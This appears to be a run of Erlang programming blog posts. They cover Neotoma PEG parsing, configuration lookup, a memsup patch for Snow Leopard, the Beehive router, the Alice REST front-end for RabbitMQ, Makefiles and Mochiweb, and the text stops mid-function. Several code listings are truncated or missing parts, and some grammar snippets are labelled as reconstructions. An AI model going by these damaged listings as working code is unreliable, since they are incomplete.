-define (SEPARATOR, $:).

file(Filename) ->
  {ok, Fd} = file:open(Filename, [read]),
  io:setopts(Fd, [binary]),
  for_each_line(Fd, fun parse/3, 1, []).

for_each_line(Device, Proc, Count, Accum) ->
  case io:get_line(Device, "") of
    eof  -> file:close(Device), Accum;
    Line ->
      NewAccum = Proc(Line, Count, Accum),
      for_each_line(Device, Proc, Count + 1, NewAccum)
  end.

parse(Line, Count, Acc) ->
  [peg_parse(Line, Count)|Acc].

peg_parse(Line, Count) ->
  {Field, Value} = parse_line(Line, [], []),
  case Field of
    comment -> ok;
    _ -> io:format("[~p] ~p:~p~n", [Count, Field, Value])
  end.

% Top
% Strip comments
parse_line(<<$#, _Rest/binary>>, [], _Acc) -> {comment, []};
% Is this the field?
parse_line(<<?SEPARATOR, Rest/binary>>, _Field, Acc) -> parse_line(Rest, lists:reverse(Acc), []);
parse_line(<<$\n, _Rest/binary>>, Field, Acc) -> {Field, lists:reverse(Acc)};
parse_line(<<>>, Field, Acc) -> {Field, lists:reverse(Acc)};
parse_line(<<Char, Rest/binary>>, Field, Acc) -> parse_line(Rest, Field, [Char|Acc]).

I'll only touch on the basics of what that is here (so if you want to skip it, just go to the next section).

Basically we open a file descriptor to the file and tell it to read in the binary format (a little faster and less work on the vm). For every line, we go through character by character and examine based on the position and context that the character is in and store the value in the context where it appears. Later we'll come back (notice where the io:format is?) and store it in some meaningful way. This is just a demo. If there is enough interest, I can finish it and post it here. Otherwise, I won't spend more time on it as there is a better way.

Introducing Neotoma

Neotoma is a project by Sean Cribbs that makes PEG parsing in erlang easy. It's a nifty tool that generates an unambiguous parser which produces a parse tree. Don't try to use this to create a parser to examine natural languages though; it's not a CFG (context-free grammar) parser.

There aren't too many resources available through google yet, so after some head-scratching and pm'ing with Sean Cribbs, the author, I was able to sketch a parser that digs out the parse tree for the grammar in a ridiculously small amount of code.

Before we get into the PEG grammar, there are a few basic pieces of terminology that you need to know.

Terminal symbols

A grammar is built from two disjoint sets of items called symbols. These are the basic pieces (or atoms) of a grammar. There are two types of symbols, the non-terminal and the terminal. They must be, by necessity, disjoint sets for a valid grammar; the reason will become apparent shortly.

*non-terminal symbol - A symbol representing a 'variable' in a grammar. These are symbols that can be replaced by other elements of the grammar.

*terminal symbol - A symbol that cannot be broken down any further, but that can be consumed by non-terminals.

Let's look at an example. These are two non-terminals that describe a signed integer in the BNF form of a grammar:

<integer> ::= ['-'] <digit> {<digit>}

<digit> ::= '0' | '1' | '2' | '3' | '4' | '5' | '6' | '7' | '8' | '9'

The integer and the digit are the non-terminals, while '0' through '9' and '-' are the terminal symbols.

PEG grammars

A "parsing expression grammar", or PEG, is a formal description of an analytic language: a set of rules for recognizing strings and their context in the language. For instance, in the English language a proper declarative sentence requires a subject and a predicate:

My name is Mary.

<subject> = My name

<predicate> = is Mary

Although you should never use a PEG to parse natural language (use a Backus-Naur Form), the corresponding PEG would look something like this (incomplete, but enough for an example):

% Psst, a Neotoma PEG for the sentence "My name is Mary"
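It might be sketched like this (the rule names and exact bodies here are my own reconstruction, and it recognizes only this one sentence):

```
sentence  <- subject " " predicate "." ~;
subject   <- "My name" ~;
predicate <- "is Mary" ~;
```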

This is a VERY basic PEG parser. What does all this mean? Well...


Let's look at the simplest possible grammar for describing the exact same thing, a signed integer.
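A sketch of that grammar, following the two rules the next paragraph describes (the exact syntax is my own reconstruction):

```
rule    <- decimal ~;
decimal <- [0-9]+ `Node`;
```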


That's it? Yep. This might look a little confusing, but don't worry, I'll explain what's happening here. First, look at the Decimal rule. That says that any digit 0 through 9 will be consumed by this rule. The stuff between the backticks is what happens to the matched number; we'll get back to that soon. The rule non-terminal will 'take' the Decimal rule in. This won't do anything interesting yet, other than say that the rule will contain an integer. Let's change that:
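The extended set of rules being described below might look something like this (again, my own reconstruction of the shape, not the original listing):

```
rule     <- additive ~;
additive <- primary "+" additive `[A, _Plus, B] = Node, A + B` / primary ~;
primary  <- "(" additive ")" `[_Open, A, _Close] = Node, A` / decimal ~;
decimal  <- [0-9]+ `list_to_integer(binary_to_list(iolist_to_binary(Node)))`;
```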


This shouldn't be too hard to understand from the rule above, but there are two new things in these rules. First, the stuff in between the backticks is the semantic part of the parse tree. Sean calls this the 'transformation' of the grammar. Neotoma stuffs all the matches of a rule into a variable called Node. From there, you can do basically what you want with what the transformation returns (so long as the rules that use it understand it). If instead of a backtick block at the end of a rule definition you put a ~, the Node variable is returned untouched.

The second new introduction in this set of rules is the /. This is an 'or' statement: a precedence-based 'or'. So, for our rules above, the primary terminal can either be an additive surrounded by parentheses OR a decimal. Note, I said that precedence is denoted here. The first item in the list is the first item matched. It's always a good idea (even the author Sean Cribbs suggests this) to try to match the longest rule possible. **Precedence is important.**

Alright, so remember the very incomplete code example from above that didn't do anything yet, that looks ugly and is exactly 37 lines long? Well, here is a very complete Neotoma version that can parse the entire file:

            % This is the PEG compiler for babysitter configuration files
            config_element  [];
                [""] -> [];
                _ ->
                  Head = proplists:get_value(head, Node),
                  Tail = [R || [_,R] 

That's it! It looks like a lot, but it's not as bad once you start looking at it. I'll leave it as an exercise to look through for now. Some hints that I picked up, either from Sean Cribbs or from working with the code for a while, to keep in mind:

*(crlf / !.) at the end of a line means either a newline (note the crlf rule at the bottom) or the EOF character at the end of the file

*The '!' means NOT; it's a negative look-ahead character, so, for example, the nonbracketed_string can be zero or more of any character except the crlf

*The 'string' rule can be either a string or the stuff inside of {}s. Notice that the bracketed_string comes first in the string rule; this is why precedence matters. Try it the other way

*You can assign 'variables' to the matches. For instance, look at the bracketed_string rule. The tag is 'str:'. This will put the tuple {str, Value} into the Node variable, so you can pull it out later.

To actually use this, make sure the neotoma.beam is in your code path (or use the -p(a/z) switch to load it) and type:
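Assuming the grammar is saved as config_grammar.peg (the filename here is my own), the generation call from the erlang shell is roughly:

```erlang
1> neotoma:file("config_grammar.peg").
```

This writes a config_grammar.erl module next to the grammar file.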


If all the syntax is correct, neotoma will generate a parser with the two exported functions parse/1 and file/1, which you can compile and use at your leisure.

To get a copy of the code discussed in this tutorial in full, clone it from this repository here: http://github.com/auser/neotoma_template.

Some quick links before I go:

*Neotoma source

*Video introduction

*Parsing Expression Grammar Wikipedia

*Google group

Thanks, and I hope this helps you figure out Neotoma. Don't hesitate to ask.

Finding a suitable deployment environment

In this new series on my blog, we'll look at a few different deployment frameworks (as alternatives to Beehive).

VMWare just released their new CloudFoundry framework to the Open-Source world. Obviously, I'm pretty interested in application deployment, so this clearly piqued my interest.

More will follow when I get more experience with CloudFoundry, but here's a quickstart to get your CloudFoundry cloud started with Vagrant and Chef in one command. Enjoy!

git clone git://github.com/auser/cloudfoundry-quickstart.git
cd cloudfoundry-quickstart
bundle install
vagrant init
vagrant up

Or, for the incredibly lazy

git clone git://github.com/auser/cloudfoundry-quickstart.git
cd cloudfoundry-quickstart

Snow Leopard Erlang woes (and the fix!)

After upgrading to Snow Leopard, I found my os_mon erlang application exploded with a very ugly error message.

=CRASH REPORT==== 12-Oct-2009::23:29:20 ===
      initial call: memsup:init/1
      pid: <0.76.0>
      registered_name: memsup
      exception exit: {{badmatch,{error,{fread,input}}},
        in function  gen_server:terminate/6
      ancestors: [os_mon_sup,<0.46.0>]
      messages: []
      links: [<0.47.0>]
      dictionary: []
      trap_exit: true
      status: running
      heap_size: 233
      stack_size: 24
      reductions: 172

After some investigation, it turns out that Snow Leopard changed the output of vm_stat, the tool that reports the memory available on the system. The new output added the line:

Pages speculative:                   42219.

where the erlang module memsup depends upon that line not being there (I'll leave the underlying ugliness to the erlang developers). In any case, the patch looks like:

--- a/lib/os_mon/src/memsup.erl
+++ b/lib/os_mon/src/memsup.erl
@@ -728,8 +728,12 @@ get_memory_usage({unix,darwin}) ->
        io_lib:fread("Pages active:~d.", skip_to_eol(Str2)),
     {ok, [Inactive],Str4} =
        io_lib:fread("Pages inactive:~d.", skip_to_eol(Str3)),
+         {ok, _,Str5} =
+       io_lib:fread("Pages speculative:~d.", skip_to_eol(Str4)),
     {ok, [Wired],_} =
-       io_lib:fread("Pages wired down:~d.", skip_to_eol(Str4)),
+       io_lib:fread("Pages wired down:~d.", skip_to_eol(Str5)),
+  %     {ok, [Wired],_} =
+  % io_lib:fread("Pages wired down:~d.", skip_to_eol(Str4)),
     NMemUsed  = (Wired + Active + Inactive) * 4000,
     NMemTotal = NMemUsed + Free * 4000,

Save this to a file, such as /tmp/erlang_patch. Full instructions for upgrading your erlang:

git clone git://github.com/mfoemmel/erlang-otp.git
cd erlang-otp
patch -l -i /tmp/erlang_patch -p1
./configure --prefix=/opt/erlang --enable-hipe
make install
export PATH=/opt/erlang/bin:$PATH

After that, you should be able to start os_mon:

1> application:start(sasl).
2> application:start(os_mon).

If it starts, you're done!

Hope this helps.

Fixed typo, thanks to Craig Krigsman

Beehive router architecture


Beehive is an open-source application deployment implementation that uses technologies like squashfs, erlang and ruby. It aims to provide a simple, easy application deployment platform. This post will go over the router portion of Beehive.


Beehive is implemented with two servers. One is the backend server that sits on the nodes available to deploy applications; the other is the router server. Note, these are not exclusive of each other, but there must be a router server that the client connects to, and the backend nodes must know how to reach the router. Here are a few specifications for the router of Beehive.

  • Mochiweb will handle the incoming requests
  • Beehive's custom router implementation will receive the request
  • Beehive's router looks up the requested subdomain in its known applications
  • The request is then handled by the backend node, by spawning an http client request to the backend node

This is the basic diagram for the request handling.

With this in mind, let's get right to the implementation of the router server. We'll come back to the backend server after we flesh out the router implementation.

Router server

For the router server, we'll use the following modules (leaving out the obvious application details, like supervisors, etc.):

  • backend_registry_srv.erl
  • app_registry_srv.erl
  • router_srv.erl

backend_registry_srv.erl

This is responsible for keeping track of all the backends the router knows about. When a new backend comes online, it will register itself with the backend_registry on the router node.


app_registry_srv.erl

This is responsible for keeping track of the current apps, or packed applications, that the router knows about. At an n-interval, the backend server (on the remote host) checks the node for new applications. If a new application is found, it registers it with this server.


router_srv.erl

This is the glue between the two above-mentioned servers. It handles messages to connect a client to the backend server that matches up to the requested resource.

Backend registry process

When the backend starts up, it must either be given a router_node, or it assumes the router is located on the same machine at the localhost name.

Application registry

Each backend node has a backend process that pings the system to see if there is a new application present. If there is an application present that was not previously known about, the app registry server is notified and updated.

Lookup routing:

When a request comes in, the router_srv is notified of a new request and asks the app_registry_srv for the list of backends that support the subdomain carrying the application.
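As a sketch of that lookup (the module and function names here are illustrative, not necessarily Beehive's actual API):

```erlang
%% Hypothetical sketch: names are illustrative, not Beehive's actual API.
handle_request(Subdomain) ->
  case app_registry_srv:lookup(Subdomain) of
    {ok, Backends} ->
      Backend = hd(Backends),   % pick one of the supporting backends
      proxy_to(Backend);
    not_found ->
      {error, unknown_app}
  end.
```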

Future upgrades

Enhance the application lookup by routing to the fastest responding backend server. This could be done by registering the router's backend server as a "listener" on the backend's backend_srv.

Getting command-line options into erlang

So you have your killer erlang application that could possibly make you millions, but it was written in a test environment. Shoot, how do you change that "on the fly" at application runtime? There are many different ways this can be accomplished. This post will go over the basics of this typical issue.


Application variables

Application variables must be declared in the .app file for your application. For instance:

{application, killer_app,
 [{description, "The most killer application ever"},
  {modules, []}, {registered,[]},{applications, [kernel,stdlib,sasl]},
  {env, [
    {key, 'value'} % proplist
  ]}
 ]}.

From here, the key is settable from the command-line simply by passing it (with a little erlang idiom):

erl -pa ./ebin -killer_app key 'new_value'

From within the application, this can be fetched by looking it up:

Value = case application:get_env(killer_app, key) of
  undefined   -> 'default';
  {ok, V}     -> V
end,

Environment variables

Sometimes it's just easier and the application runtime environment requires that variables need to be fetched from an environment variable. These are also super easy to lookup, arguably even easier:

EnvParam = string:to_upper(erlang:atom_to_list('key')),
Value = case os:getenv(EnvParam) of
  false -> Default;
  E -> E
end,

This can obviously be set the standard way an environment variable is set:

KEY='awesome_value' erl -pa ./ebin

Configuration file

Other times I just want to set my configuration in a file and be done with it, so that deployment is only dependent upon a change of the configuration file. An application configuration file is a newline separated set of proplists. For instance, it might look like:

{port, 8080}.
{log_path, "logs/killer_app.log"}.

These are pretty easy to look up as well, but it's important to note that the variables set here must be in the application configuration file as shown above. Fetching these variables might look something like:

Proplists = case file:consult("config/config.cfg") of
  {ok, C} -> C;
  O -> O
end,
Value = proplists:get_value(key, Proplists).

I tend to like more niceties than this, don't you? When fetching from a configuration file, I tend to use a helper:

-module (config).
-include ("killer_app.hrl").
-compile (export_all).

%% Function: Read the config file () -> {ok, Config} | 
%%                                      {error, Reason}
%% Description: Read the configuration data
read() ->
  case read_1(?CONFIG_FILE) of
    {ok, C} -> {ok, C};
    {error, enoent} -> {error, no_file};
    Err -> Err
  end.

read_1(Location) -> file:consult(Location).

%% Function: get (Key, Config) -> {error, not_found} |
%%                                {ok, Value}
%% Description: Get the value of a config element
get(Key) ->
  case read() of
    {ok, Config} -> get(Key, Config);
    Err -> Err
  end.
get(_Key, []) ->
  {error, not_found};
get(Key, [{Key, Value} | _Config]) ->
  {ok, Value};
get(Key, [{_Other, _Value} | Config]) ->
  get(Key, Config).

By using that, I can simply call:
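For example, with the sample config file from earlier, grabbing the port would be:

```erlang
{ok, Port} = config:get(port).
```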


Finally, I hate to clutter my code with all the funkiness of fetching an application variable, so I tend to use a utility that cleans it up pretty nicely.

-module (apps).

-export ([search_for_application_value/3]).

% Find the application config value
search_for_application_value(Param, Default, App) ->
  case application:get_env(App, Param) of
    undefined         -> search_for_application_value_from_config(Param, Default);
    {ok, undefined}   -> search_for_application_value_from_config(Param, Default);
    {ok, V}           -> V
  end.

search_for_application_value_from_config(Param, Default) ->
  case config:get(Param) of
    {error, _} -> search_for_application_value_from_environment(Param, Default);
    {ok, V}    -> V
  end.

search_for_application_value_from_environment(Param, Default) ->
  EnvParam = string:to_upper(erlang:atom_to_list(Param)),
  case os:getenv(EnvParam) of
    false -> Default;
    E -> E
  end.

Using this, I can simply call the following and get built-in defaults for free:

Port = apps:search_for_application_value(port, 8080, killer_app).

Announcing Alice and Wonderland



As a queue server, RabbitMQ is super cool, but my company is hesitant to use it without a nice front-end or access to statistics about the server. So we set out to develop a RESTful interface to RabbitMQ: Alice.

Alice is a RESTful interface to the RabbitMQ server that talks directly through erlang's native interface, epmd. The purely RESTful server responds to the same interface as the RabbitMQ's command-line interface and presents a native HTTP interface to the data. Alice is written with Mochiweb.


How to get started:

git clone git://github.com/auser/alice.git
cd alice
./start.sh

Currently exposed RESTful routes

/conn - Current connection information
/exchanges - Current exchanges information
/queues - Current queues
/users - Current users
/bindings - Current bindings
/control - Access to the RabbitMQ control
/permissions - Current permissions
/vhosts - Current vhosts

These endpoints are all exposed with the four verbs (get, post, put, delete) and respond in JSON (except the root / endpoint, which responds with text/html).



# List users
curl -i http://localhost:9999/users 
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:08:20 GMT
Content-Type: text/json
Content-Length: 19


# Viewing a specific user
curl -i http://localhost:9999/users/guest
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:01:01 GMT
Content-Type: text/json
Content-Length: 17


# If the user is not a user:
curl -i http://localhost:9999/users/bob  
HTTP/1.1 400 Bad Request
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:01:20 GMT
Content-Type: text/json
Content-Length: 20

{"bob":"not a user"}

# Add a user
curl -i -XPOST \
        -d'{"username":"ari", "password":"weak password"}' \

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Thu, 16 Jul 2009 00:10:35 GMT
Content-Type: text/json
Content-Length: 25


# Deleting a user
curl -i -XDELETE  http://localhost:9999/users/ari
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:19:24 GMT
Content-Type: text/json
Content-Length: 19


Notice that when we list the user that doesn't exist, bob from the second example above, the return is a 400. This is especially useful when you want to access the data programmatically. More on extending Alice below and how to get access to the return value of the requested route.

The same basic usage is applied to all the routes listed, as you can see:


# List connections
curl -i http://localhost:9999/conn
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:30:52 GMT
Content-Type: text/json
Content-Length: 287

{"conn":[{"pid":"...","ip":"","port":"5672","peer_address":"" ...}]}


# List the current exchanges
curl -i http://localhost:9999/exchanges
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:34:14 GMT
Content-Type: text/json
Content-Length: 654



# List the current queues
curl -i http://localhost:9999/queues   
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:35:42 GMT
Content-Type: text/json
Content-Length: 60



# List the current bindings
curl -i http://localhost:9999/bindings
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:36:13 GMT
Content-Type: text/json
Content-Length: 69



# List permissions
curl -i http://localhost:9999/permissions
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:37:32 GMT
Content-Type: text/json
Content-Length: 42


# You can specify permissions on a vhost
curl -i http://localhost:9999/permissions/vhost/root
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:50:33 GMT
Content-Type: text/json
Content-Length: 42

# Setting permissions
curl -i -XPOST -d '{"vhost":"/", "configure":".*", "read":".*", "write":".*"}' \
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:55:33 GMT
Content-Type: text/json
Content-Length: 38



# List vhosts
curl -i http://localhost:9999/vhosts
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:57:10 GMT
Content-Type: text/json
Content-Length: 16


# Viewing a specific vhost
curl -i http://localhost:9999/vhosts/barneys%20list
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:59:29 GMT
Content-Type: text/json
Content-Length: 25

{"vhosts":"barneys list"}

# If it doesn't exist:
curl -i http://localhost:9999/vhosts/barneys%20listings
HTTP/1.1 400 Bad Request
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:59:59 GMT
Content-Type: text/json
Content-Length: 34

{"barneys listings":"not a vhost"}

# Add a vhost
curl -i http://localhost:9999/vhosts -XPOST -d'{"name":"barneys list"}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:58:09 GMT
Content-Type: text/json
Content-Length: 31

{"vhosts":["/","barneys list"]}

# Delete a vhost
curl -XDELETE -i http://localhost:9999/vhosts/barneys%20list
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:02:44 GMT
Content-Type: text/json
Content-Length: 16


Now, there is a module in Alice called control. There are a lot of routes and a lot of functionality built in here, so let's dig in.


# Getting the status of the server
curl -i http://localhost:9999/control 
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:05:19 GMT
Content-Type: text/json
Content-Length: 151

{"status":[{"applications":["rabbit","mnesia","os_mon","sasl","stdlib","kernel"], \

# Stopping the rabbitmq-server
curl -XPOST -i http://localhost:9999/control/stop  
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:06:02 GMT
Content-Type: text/json
Content-Length: 20


# Starting the rabbitmq-server application
curl -XPOST -i http://localhost:9999/control/start_app
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:06:50 GMT
Content-Type: text/json
Content-Length: 20


# Stopping the rabbitmq-server application
curl -XDELETE -i http://localhost:9999/control/stop_app
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:15:56 GMT
Content-Type: text/json
Content-Length: 20


# Reset the rabbitmq-server application
curl -XPOST -i http://localhost:9999/control/reset    
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:07:15 GMT
Content-Type: text/json
Content-Length: 18


# Or force-resetting the server
curl -XPOST -i http://localhost:9999/control/force_reset
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:07:27 GMT
Content-Type: text/json
Content-Length: 18


# Clustering a set of nodes
curl -XPOST -i http://localhost:9999/control/cluster -d'{"nodes":["bob@otherhost"]}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:14:10 GMT
Content-Type: text/json
Content-Length: 20


# Rotating rabbit logs
curl -XPOST -i http://localhost:9999/control/rotate_logs -d'{"prefix":"mn_"}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:15:12 GMT
Content-Type: text/json
Content-Length: 25



Alice is written with the intention of being highly extensible and makes it easy to do so. The controllers respond only to the four verbs with pattern-matching on the routes.

For instance, a very basic controller looks like this:

-module (say).
-export ([get/1, post/2, put/2, delete/2]).

get([]) -> {"hello", <<"world">>};
get(_Path) -> {"error", <<"unhandled request">>}.

post(_Path, _Data) -> {"error", <<"unhandled request">>}.
put(_Path, _Data) -> {"error", <<"unhandled request">>}.
delete(_Path, _Data) -> {"error", <<"unhandled request">>}.

Those are the four RESTful verbs the controller responds to. Now, if you were to compile this in Alice (in src/rest_server/controllers), the route http://localhost:9999/say would become accessible. Cool!

curl -i http://localhost:9999/say
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:20:57 GMT
Content-Type: text/json
Content-Length: 17


Now let's add a route to say hello to someone:

-module (say).
-export ([get/1, post/2, put/2, delete/2]).

get([Name]) -> {"hello", erlang:list_to_binary(Name)};
get([]) -> {"hello", <<"world">>};
% ....

curl -i http://localhost:9999/say/ari
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:21:54 GMT
Content-Type: text/json
Content-Length: 15


Finally, with every verb other than get, we are given data to extract. Let's see how to pull some data out in a post. The data is given as a proplist with binary keys, so it's pretty easy to pull them out:

% ...
post([], Data) ->
  Name = erlang:binary_to_list(proplists:get_value(<<"name">>, Data)),
  {"hello back", erlang:list_to_binary(Name)};
post(_Path, _Data) ->
% ...

Let's check it:

curl -i http://localhost:9999/say -XPOST -d'{"name":"ari"}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:23:54 GMT
Content-Type: text/json
Content-Length: 20

{"hello back":"ari"}

It's as easy as pie to extend Alice.


Wonderland is the web UI for Alice. It is driven by the javascript framework Sammy on the front-end and Alice on the backend. Because the framework is client-side and accesses the data through ajax, Wonderland can be deployed nearly anywhere.


cd alice
make wonderland



Check these two projects out on github at:

http://github.com/auser/alice http://github.com/auser/wonderland.


*Issue tracker

*Google group

*irc: irc.freenode.net / #poolpartyrb

Or feel free to ping me on email (arilerner dot mac dot com) if you have any questions.

Alice, the app


Makefiles making erlang easy

Update (01/04/2010): Added a github repos with a project template for starting new projects here: http://github.com/auser/erlproject_template.

The Rakefile in a ruby project is almost as important as the code itself. Ask any rubyist to show you their project and you can bet your bottom dollar that nine out of every ten of their projects has a Rakefile (most of the time, it's ten out of ten). This is one thing that can make starting an erlang project painful... the Makefile (bum bum buuuummmm). Today, I'll share a Makefile (for my own future reference too!) that works really well for me and my projects.

I've attached a sample project directory to get started (for the impatient, you can get the files here if you'd like to follow along). It includes a sample application file, a sample gen_server and of course all the files in this post. Let's get started:

First, the Makefile:

# Makefile
LIBDIR      = `erl -eval \
  'io:format("~s~n", [code:lib_dir()])' -s init stop -noshell`
VERSION     = 0.0.1
CC          = erlc
ERL         = erl
EBIN        = ebin
CFLAGS      = -I include -pa $(EBIN)
COMPILE     = $(CC) $(CFLAGS) -o $(EBIN)
EBIN_DIRS   = $(wildcard deps/*/ebin)

all: mochi ebin compile
all_boot: all make_boot
start: all start_all

mochi:
	@(cd deps/mochiweb;$(MAKE))

compile:
	@$(ERL) -pa $(EBIN_DIRS) -noinput +B \
	-eval 'case make:all() of up_to_date -> halt(0); \
	      error -> halt(1) end.'

edoc:
	@echo Generating $(APP) documentation from srcs
	@erl -noinput -eval 'edoc:application($(APP), "./", \
	      [{doc, "doc/"}, {files, "src/"}])' -s erlang halt

make_boot:
	(cd ebin; erl -pa ebin -noshell \
	  -run make_boot write_scripts rest_app)

start_all:
	(cd ebin; erl -pa ebin -noshell -sname _name_ -boot _name_)

ebin:
	@mkdir ebin

clean:
	rm -rf ebin/*.beam ebin/erl_crash.dump erl_crash.dump
	rm -rf ebin/*.boot ebin/*.rel ebin/*.script
	rm -rf doc/*.html doc/*.css doc/erlang.png doc/edoc-info

This particular project (not yet announced) uses mochiweb (and it's a good example to show dependencies, so I left it in), so we have a mochi task to compile all of the mochiweb sources. Before showing the EMakefile, which is what drives the compile task, it's important to note that there is also a make_boot task that creates a boot file for the project. This is pretty interesting, so let's dive into it real quick:

% make_boot.erl
-module (make_boot).
-export ([write_scripts/1]).

write_scripts(Args) ->
  [Name] = Args,
  io:format("write_scripts for ~p~n", [Name]),
  Erts = erlang:system_info(version),
  Version = "0.1",
  Apps = application:which_applications(),
  {value, {kernel, _, Kernel}} = lists:keysearch(kernel, 1, Apps),
  {value, {stdlib, _, Stdlib}} = lists:keysearch(stdlib, 1, Apps),
  {value, {sasl, _, Sasl}} = lists:keysearch(sasl, 1, Apps),

  Rel = "{release, {\"~s\", \"~s\"}, {erts, \"~s\"}, ["
        "{kernel, \"~s\"}, {stdlib, \"~s\"}, "
        "{sasl, \"~s\"}, {~s, \"~s\"}]}.",

  Lowername = string:to_lower(Name),

  Filename = lists:flatten(Lowername ++ ".rel"),
  io:format("Writing to ~p (as ~s)~n", [Filename, Lowername]),
  {ok, Fs} = file:open(Filename, [write]),

  io:format(Fs, Rel, [Name, Version, Erts, Kernel, Stdlib, Sasl,
                      Lowername, Version]),
  file:close(Fs),

  systools:make_script(Lowername, [local]).

To actually write a boot file, we need to supply the application name to the function call, so we call it like so:

% shell command
erl -pa ebin -noshell -run make_boot write_scripts rest_app

Finally, let's make sure we have a .app file in the ebin/ directory; a sample one is below:

% _name_.app
{application, _name_, [
  {description, "_Name_"},
  {vsn, "0.1"},
  {modules, [_modules_]},
  {env, [
    {port, 9999}
  ]},
  {registered, [_name_]},
  {applications, [kernel, stdlib]},
  {mod, {_name_, []}}
]}.

Lastly, break out the EMakefile so that we can actually compile the project:

% EMakefile
% -*- mode: erlang -*-
{["src/*", "src/*/*", "src/*/*/*"],
 [{i, "include"},
  {outdir, "ebin"}]}.

Hurray, we are almost set. Now let's make a start.sh file so we can just call that to start the application:

#!/bin/sh
# start.sh
cd `dirname $0`
erl -pa $PWD/ebin -pa $PWD/deps/*/ebin \
    -sname alice -s reloader -boot rest_app $1

Easy as pie.

To show you why this is a great setup, simply navigate to the project directory and type

make && ./start.sh

And your server should start right up.

A quick tip I've picked up... grab rstakeout so that any time you change a file in the src/ directory, your application recompiles automatically:

rstakeout "make" "src/**/*"

Lemme know if this helps; I love to hear feedback!

Download project files here


I've added a generic makefile generator in my erlang snippet project: Skelerl. Get it on github and type:

makefile app_name

Using mochiweb to create a web framework in erlang

Recently, I used Mochiweb for several projects (Alice, for one) I've been working on. After some investigation of the current erlang web frameworks, Mochiweb suited our needs well. It's lightweight, fast, and open-source, with readable source code. Throughout this post, we'll build a little mochiweb application a piece at a time; the full source will be available for download at the end of the article.

So with no further ado:

Using mochiweb in erlang

Starting mochiweb is pretty straightforward: calling the mochiweb_http:start/1 function starts the mochiweb application. This is, to me, the most dynamic way to start a mochiweb application; while it can be done in other ways, this allows more flexibility. Notice that we'll be passing a loop function. We'll define that shortly, but for now, just note that it's the function that will receive the requests.

-module (mochiweb_server).
-export ([start_mochiweb/1]).

start_mochiweb(Args) ->
  [Port] = Args,
  io:format("Starting mochiweb_http with ~p~n", [Port]),
  mochiweb_http:start([ {port, Port},
                        {loop, fun dispatch_requests/1}]).

Now, as promised, let's look at how we'll handle the requests:

-export ([dispatch_requests/1]).

% ...

dispatch_requests(Req) ->
  Path = Req:get(path),
  Action = clean_path(Path),
  handle(Action, Req).

% Get a clean path
% strips off the query string
clean_path(Path) ->
  case string:str(Path, "?") of
    0 -> Path;
    N -> string:substr(Path, 1, N - 1)
  end.

The Req that is passed in is a mochiweb_request, which gives us access to all the methods defined in the mochiweb_request module. We'll use Req:get(path) to pull out the path. Notice that we are also pulling out the Action the path defines by stripping off any query string at the end. Sweet.
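As a quick sanity check, here is clean_path exercised on its own (the module name clean_path_demo is made up just for this sketch):

```erlang
% clean_path_demo.erl -- a self-contained copy of clean_path,
% exported so we can poke at it from the shell.
-module(clean_path_demo).
-export([clean_path/1]).

% Strip everything from the first "?" onward; if there is no
% query string, return the path untouched.
clean_path(Path) ->
  case string:str(Path, "?") of
    0 -> Path;
    N -> string:substr(Path, 1, N - 1)
  end.
```

In the shell, clean_path_demo:clean_path("/users/1?foo=bar") gives back "/users/1", while a path with no query string comes back unchanged.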

Now, for some nifty request handling, we'll use the handle function to route requests with Erlang's pattern matching:

handle("/favicon.ico", Req) ->
